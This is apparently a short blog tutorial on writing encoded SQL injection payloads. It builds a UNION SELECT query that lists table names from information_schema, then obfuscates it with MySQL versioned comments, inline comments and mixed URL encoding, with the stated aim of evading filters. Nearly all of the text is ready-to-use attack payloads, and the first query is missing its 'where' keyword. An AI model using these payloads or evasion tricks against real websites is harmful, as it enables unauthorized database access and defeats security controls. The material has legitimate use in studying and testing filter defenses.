Create encoded sql payloads

In this part I would like to give an example of how to create an encoded payload.

First we are going to define the payload that we want to encode:

union select 1,2,3,concat(table_name),5 from information_schema.tables table_schema = database()

this case we are using the payload without any coding, but we have more ways to declare the payload, this by changing its syntax and adding other things even without coding, for example:

union all(select 1,2,3,concat(table_name),5) from information_schema.tables where table_schema = database()

To start coding we are going to first use the comments method:

/*!50000union*//**//*!50000all/*(/*!50000select*//**/1,2,3,/*!50000concat*/(table_name),5)/**//*!50000from*//**//*!50000information_schema.tables*//**//*!50000where*//**//*!50000table_schema*/=database()

Now we have it encoded with comments, but we can mix encodings, for example with the URL method:

/*!50000%75%6e%69on*//**//*!50000all/*(/*!50000%73%65%6cect*//**/1,2,3,/*!50000%63oncat*/(table_name),5)/**//*!50000%66rom*//**//*!50000%69nformation_schema.tables*//**//*!50000wh%65re*//**//*!50000table_schema*/=database()

In this way we can evade filters and play with different encodings and mixes.

Leave a Reply